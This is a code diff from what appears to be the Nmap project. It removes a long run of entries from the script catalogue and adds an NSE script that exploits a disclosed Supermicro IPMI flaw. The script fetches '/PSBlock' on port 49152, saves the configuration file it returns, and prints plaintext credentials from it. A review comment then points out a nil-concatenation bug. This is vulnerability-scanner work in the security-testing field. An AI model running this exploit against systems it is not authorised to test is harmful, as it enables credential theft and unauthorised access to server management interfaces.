diff --git a/scripts/script.db b/scripts/script.db index 713f14535..27e7999b7 100644 --- a/scripts/script.db +++ b/scripts/script.db 
@@ -236,248 +236,3 @@ Entry { filename = "http-vuln-cve2014-2129.nse", categories = { "safe", "vuln", Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } } Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } } Entry { filename = "http-waf-fingerprint.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "http-wordpress-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "http-wordpress-enum.nse", categories = { "auth", "intrusive", "vuln", } } -Entry { filename = "http-wordpress-plugins.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "http-xssed.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "iax2-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "iax2-version.nse", categories = { "version", } } -Entry { filename = "icap-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "ike-version.nse", categories = { "default", "discovery", "safe", "version", } } -Entry { filename = "imap-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "imap-capabilities.nse", categories = { "default", "safe", } } -Entry { filename = "informix-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "informix-query.nse", categories = { "auth", "intrusive", } } -Entry { filename = "informix-tables.nse", categories = { "auth", "intrusive", } } -Entry { filename = "ip-forwarding.nse", categories = { "discovery", "safe", } } -Entry { filename = "ip-geolocation-geobytes.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "ip-geolocation-geoplugin.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "ip-geolocation-ipinfodb.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "ip-geolocation-maxmind.nse", categories = { "discovery", "external", "safe", } } -Entry { filename 
= "ipidseq.nse", categories = { "discovery", "safe", } } -Entry { filename = "ipv6-node-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ipv6-ra-flood.nse", categories = { "dos", "intrusive", } } -Entry { filename = "irc-botnet-channels.nse", categories = { "discovery", "safe", "vuln", } } -Entry { filename = "irc-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "irc-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "irc-sasl-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "irc-unrealircd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } } -Entry { filename = "iscsi-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "iscsi-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "isns-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "jdwp-exec.nse", categories = { "exploit", "intrusive", } } -Entry { filename = "jdwp-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "jdwp-inject.nse", categories = { "exploit", "intrusive", } } -Entry { filename = "jdwp-version.nse", categories = { "version", } } -Entry { filename = "krb5-enum-users.nse", categories = { "auth", "intrusive", } } -Entry { filename = "ldap-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "ldap-novell-getpass.nse", categories = { "discovery", "safe", } } -Entry { filename = "ldap-rootdse.nse", categories = { "discovery", "safe", } } -Entry { filename = "ldap-search.nse", categories = { "discovery", "safe", } } -Entry { filename = "lexmark-config.nse", categories = { "discovery", "safe", } } -Entry { filename = "llmnr-resolve.nse", categories = { "broadcast", "discovery", "safe", } } -Entry { filename = "lltd-discovery.nse", categories = { "broadcast", "discovery", "safe", } } -Entry { filename = "maxdb-info.nse", categories = { "default", 
"version", } } -Entry { filename = "mcafee-epo-agent.nse", categories = { "safe", "version", } } -Entry { filename = "membase-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "membase-http-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "memcached-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "metasploit-info.nse", categories = { "intrusive", "safe", } } -Entry { filename = "metasploit-msgrpc-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "metasploit-xmlrpc-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "mikrotik-routeros-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "mmouse-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "mmouse-exec.nse", categories = { "intrusive", } } -Entry { filename = "modbus-discover.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "mongodb-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "mongodb-databases.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "mongodb-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "mrinfo.nse", categories = { "broadcast", "discovery", "safe", } } -Entry { filename = "ms-sql-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "ms-sql-config.nse", categories = { "discovery", "safe", } } -Entry { filename = "ms-sql-dac.nse", categories = { "discovery", "safe", } } -Entry { filename = "ms-sql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } } -Entry { filename = "ms-sql-empty-password.nse", categories = { "auth", "intrusive", } } -Entry { filename = "ms-sql-hasdbaccess.nse", categories = { "auth", "discovery", "safe", } } -Entry { filename = "ms-sql-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ms-sql-query.nse", categories = { "discovery", "safe", } } -Entry { 
filename = "ms-sql-tables.nse", categories = { "discovery", "safe", } } -Entry { filename = "ms-sql-xp-cmdshell.nse", categories = { "intrusive", } } -Entry { filename = "msrpc-enum.nse", categories = { "discovery", "safe", } } -Entry { filename = "mtrace.nse", categories = { "broadcast", "discovery", "safe", } } -Entry { filename = "murmur-version.nse", categories = { "version", } } -Entry { filename = "mysql-audit.nse", categories = { "discovery", "safe", } } -Entry { filename = "mysql-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "mysql-databases.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "mysql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } } -Entry { filename = "mysql-empty-password.nse", categories = { "auth", "intrusive", } } -Entry { filename = "mysql-enum.nse", categories = { "brute", "intrusive", } } -Entry { filename = "mysql-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "mysql-query.nse", categories = { "auth", "discovery", "safe", } } -Entry { filename = "mysql-users.nse", categories = { "auth", "intrusive", } } -Entry { filename = "mysql-variables.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "mysql-vuln-cve2012-2122.nse", categories = { "discovery", "intrusive", "vuln", } } -Entry { filename = "nat-pmp-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "nat-pmp-mapport.nse", categories = { "discovery", "safe", } } -Entry { filename = "nbstat.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ncp-enum-users.nse", categories = { "auth", "safe", } } -Entry { filename = "ncp-serverinfo.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ndmp-fs-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "ndmp-version.nse", categories = { "version", } } -Entry { filename = "nessus-brute.nse", categories = { "brute", "intrusive", } 
} -Entry { filename = "nessus-xmlrpc-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "netbus-auth-bypass.nse", categories = { "auth", "safe", "vuln", } } -Entry { filename = "netbus-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "netbus-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "netbus-version.nse", categories = { "version", } } -Entry { filename = "nexpose-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "nfs-ls.nse", categories = { "discovery", "safe", } } -Entry { filename = "nfs-showmount.nse", categories = { "discovery", "safe", } } -Entry { filename = "nfs-statfs.nse", categories = { "discovery", "safe", } } -Entry { filename = "nping-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "nrpe-enum.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "ntp-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ntp-monlist.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "omp2-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "omp2-enum-targets.nse", categories = { "discovery", "safe", } } -Entry { filename = "openlookup-info.nse", categories = { "default", "discovery", "safe", "version", } } -Entry { filename = "openvas-otp-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "oracle-brute-stealth.nse", categories = { "brute", "intrusive", } } -Entry { filename = "oracle-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "oracle-enum-users.nse", categories = { "auth", "intrusive", } } -Entry { filename = "oracle-sid-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "ovs-agent-version.nse", categories = { "version", } } -Entry { filename = "p2p-conficker.nse", categories = { "default", "safe", } } -Entry { filename = "path-mtu.nse", categories = { "discovery", "safe", } } 
-Entry { filename = "pcanywhere-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "pgsql-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "pjl-ready-message.nse", categories = { "intrusive", } } -Entry { filename = "pop3-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "pop3-capabilities.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "pptp-version.nse", categories = { "version", } } -Entry { filename = "qconn-exec.nse", categories = { "exploit", "intrusive", "vuln", } } -Entry { filename = "qscan.nse", categories = { "discovery", "safe", } } -Entry { filename = "quake1-info.nse", categories = { "default", "discovery", "safe", "version", } } -Entry { filename = "quake3-info.nse", categories = { "default", "discovery", "safe", "version", } } -Entry { filename = "quake3-master-getservers.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "rdp-enum-encryption.nse", categories = { "discovery", "safe", } } -Entry { filename = "rdp-vuln-ms12-020.nse", categories = { "intrusive", "vuln", } } -Entry { filename = "realvnc-auth-bypass.nse", categories = { "auth", "default", "safe", } } -Entry { filename = "redis-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "redis-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "resolveall.nse", categories = { "discovery", "safe", } } -Entry { filename = "reverse-index.nse", categories = { "safe", } } -Entry { filename = "rexec-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "rfc868-time.nse", categories = { "discovery", "safe", "version", } } -Entry { filename = "riak-http-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "rlogin-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "rmi-dumpregistry.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "rmi-vuln-classloader.nse", 
categories = { "intrusive", "vuln", } } -Entry { filename = "rpc-grind.nse", categories = { "version", } } -Entry { filename = "rpcap-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "rpcap-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "rpcinfo.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "rsync-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "rsync-list-modules.nse", categories = { "discovery", "safe", } } -Entry { filename = "rtsp-methods.nse", categories = { "default", "safe", } } -Entry { filename = "rtsp-url-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "s7-info.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "samba-vuln-cve-2012-1182.nse", categories = { "intrusive", "vuln", } } -Entry { filename = "servicetags.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "sip-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "sip-call-spoof.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "sip-enum-users.nse", categories = { "auth", "intrusive", } } -Entry { filename = "sip-methods.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "skypev2-version.nse", categories = { "version", } } -Entry { filename = "smb-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "smb-check-vulns.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } -Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "smb-enum-sessions.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "smb-enum-shares.nse", categories = { "discovery", "intrusive", } } -Entry { filename = 
"smb-enum-users.nse", categories = { "auth", "intrusive", } } -Entry { filename = "smb-flood.nse", categories = { "dos", "intrusive", } } -Entry { filename = "smb-ls.nse", categories = { "discovery", "safe", } } -Entry { filename = "smb-mbenum.nse", categories = { "discovery", "safe", } } -Entry { filename = "smb-os-discovery.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "smb-print-text.nse", categories = { "intrusive", } } -Entry { filename = "smb-psexec.nse", categories = { "intrusive", } } -Entry { filename = "smb-security-mode.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "smb-server-stats.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "smb-system-info.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "smb-vuln-ms10-054.nse", categories = { "dos", "intrusive", "vuln", } } -Entry { filename = "smb-vuln-ms10-061.nse", categories = { "intrusive", "vuln", } } -Entry { filename = "smbv2-enabled.nse", categories = { "default", "safe", } } -Entry { filename = "smtp-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "smtp-commands.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "smtp-enum-users.nse", categories = { "auth", "external", "intrusive", } } -Entry { filename = "smtp-open-relay.nse", categories = { "discovery", "external", "intrusive", } } -Entry { filename = "smtp-strangeport.nse", categories = { "malware", "safe", } } -Entry { filename = "smtp-vuln-cve2010-4344.nse", categories = { "exploit", "intrusive", "vuln", } } -Entry { filename = "smtp-vuln-cve2011-1720.nse", categories = { "intrusive", "vuln", } } -Entry { filename = "smtp-vuln-cve2011-1764.nse", categories = { "intrusive", "vuln", } } -Entry { filename = "sniffer-detect.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "snmp-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "snmp-hh3c-logins.nse", 
categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-interfaces.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-ios-config.nse", categories = { "intrusive", } } -Entry { filename = "snmp-netstat.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-processes.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-sysdescr.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-win32-services.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-win32-shares.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-win32-software.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "snmp-win32-users.nse", categories = { "auth", "default", "safe", } } -Entry { filename = "socks-auth-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "socks-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "socks-open-proxy.nse", categories = { "default", "discovery", "external", "safe", } } -Entry { filename = "ssh-hostkey.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ssh2-enum-algos.nse", categories = { "discovery", "safe", } } -Entry { filename = "sshv1.nse", categories = { "default", "safe", } } -Entry { filename = "ssl-ccs-injection.nse", categories = { "safe", "vuln", } } -Entry { filename = "ssl-cert.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ssl-date.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "ssl-enum-ciphers.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "ssl-google-cert-catalog.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "ssl-heartbleed.nse", categories = { "safe", "vuln", } } -Entry { filename = "ssl-known-key.nse", categories = { "default", 
"discovery", "safe", "vuln", } } -Entry { filename = "sslv2.nse", categories = { "default", "safe", } } -Entry { filename = "sstp-discover.nse", categories = { "default", "discovery", } } -Entry { filename = "stun-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "stun-version.nse", categories = { "version", } } -Entry { filename = "stuxnet-detect.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "svn-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "targets-asn.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "targets-ipv6-multicast-echo.nse", categories = { "broadcast", "discovery", } } -Entry { filename = "targets-ipv6-multicast-invalid-dst.nse", categories = { "broadcast", "discovery", } } -Entry { filename = "targets-ipv6-multicast-mld.nse", categories = { "broadcast", "discovery", } } -Entry { filename = "targets-ipv6-multicast-slaac.nse", categories = { "broadcast", "discovery", } } -Entry { filename = "targets-sniffer.nse", categories = { "broadcast", "discovery", "safe", } } -Entry { filename = "targets-traceroute.nse", categories = { "discovery", "safe", } } -Entry { filename = "teamspeak2-version.nse", categories = { "version", } } -Entry { filename = "telnet-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "telnet-encryption.nse", categories = { "discovery", "safe", } } -Entry { filename = "tftp-enum.nse", categories = { "discovery", "intrusive", } } -Entry { filename = "tls-nextprotoneg.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "traceroute-geolocation.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "unittest.nse", categories = { "safe", } } -Entry { filename = "unusual-port.nse", categories = { "safe", } } -Entry { filename = "upnp-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "url-snarf.nse", categories = { "safe", } } -Entry { 
filename = "ventrilo-info.nse", categories = { "default", "discovery", "safe", "version", } } -Entry { filename = "versant-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "vmauthd-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "vnc-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "vnc-info.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "voldemort-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "vuze-dht-info.nse", categories = { "discovery", "safe", } } -Entry { filename = "wdb-version.nse", categories = { "default", "discovery", "version", "vuln", } } -Entry { filename = "weblogic-t3-info.nse", categories = { "default", "discovery", "safe", "version", } } -Entry { filename = "whois-domain.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "whois-ip.nse", categories = { "discovery", "external", "safe", } } -Entry { filename = "wsdd-discover.nse", categories = { "default", "discovery", "safe", } } -Entry { filename = "x11-access.nse", categories = { "auth", "default", "safe", } } -Entry { filename = "xdmcp-discover.nse", categories = { "discovery", "safe", } } -Entry { filename = "xmpp-brute.nse", categories = { "brute", "intrusive", } } -Entry { filename = "xmpp-info.nse", categories = { "default", "discovery", "safe", "version", } } diff --git a/scripts/supermicro-ipmi-conf.nse b/scripts/supermicro-ipmi-conf.nse new file mode 100644 index 000000000..fdda0264c --- /dev/null +++ b/scripts/supermicro-ipmi-conf.nse 
@@ -0,0 +1,95 @@
+description = [[
+Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
+
+The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains users with their passwords in plain text.
+
+References:
+* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
+* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
+]]
+
+---
+-- @usage nmap -p49152 --script supermicro-ipmi-conf
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 49152/tcp open unknown syn-ack
+-- | supermicro-ipmi-conf:
+-- | VULNERABLE:
+-- | Supermicro IPMI/BMC configuration file disclosure
+-- | State: VULNERABLE (Exploitable)
+-- | Description:
+-- | Some Supermicro IPMI/BMC controllers allow attackers to download
+-- | a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
+-- | network's Active Directory.
+-- | Disclosure date: 2014-06-19
+-- | Extra information:
+-- | Snippet from configuration file:
+-- | .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
+-- | Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
+-- |
+-- | References:
+-- |_ http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
+--
+-- @args supermicro-ipmi-conf.out Output file to store configuration file. Default: _bmc.conf
+---
+
+author = "Paulino Calderon "
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln"}
+
+local http = require "http"
+local nmap = require "nmap"
+local shortport = require "shortport"
+local string = require "string"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+
+portrule = shortport.portnumber(49152, "tcp")
+
+---
+--Writes string to file
+local function write_file(filename, contents)
+ local f, err = io.open(filename, "w")
+ if not f then
+ return f, err
+ end
+ f:write(contents)
+ f:close()
+ return true
+end
+
+action = function(host, port)
+ local fw = stdnse.get_script_args(SCRIPT_NAME..".out") or host.ip.."_bmc.conf"
+ local vuln = {
+ title = 'Supermicro IPMI/BMC configuration file disclosure',
+ state = vulns.STATE.NOT_VULN,
+ description = [[
+Some Supermicro IPMI/BMC controllers allow attackers to download
+ a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
+network's Active Directory.]],
+ references = {
+ 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/',
+ },
+ dates = {
+ disclosure = {year = '2014', month = '06', day = '19'},
+ },
+ }
+
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local open_session = http.get(host.ip, port, "/PSBlock")
+ if open_session and open_session.status ==200 and string.len(open_session.body)>200 then
+ s = open_session.body:gsub("%z", ".")
+ vuln.state = vulns.STATE.EXPLOIT
+ vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)
+ local status, err = write_file(fw,s)
+ if status then
+ extra_info = string.format("\nConfiguration file saved to '%s'\n", fw)
+ else
+ stdnse.debug(1, "Error saving configuration file to '%s': %s\n", fw, err)
+ end
+
+ vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)..extra_info
+ end
+ return vuln_report:make_output(vuln)
+end
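Review bot: The write-failure path in `action` aborts the script instead of reporting: `extra_info` is assigned only when `write_file` succeeds, so in the `else` branch the final `..extra_info` concatenates a nil value and raises, losing the vulnerability report for a host that was in fact found vulnerable. `s` and `extra_info` are also accidental globals, and the first `vuln.extra_info = ...` assignment is dead because the one after the `if` overwrites it. Suggested change: `local s = open_session.body:gsub("%z", ".")`, `local extra_info = ""` placed before `if status then`, and removal of the earlier `vuln.extra_info` assignment. Since the saved file is the NUL-substituted `s` rather than the raw body and is created with the process's default file permissions while holding plaintext credentials, the `@args` doc should say so, e.g. `-- The saved copy has NUL bytes replaced by '.' and is written with default file permissions; protect or delete it after review.`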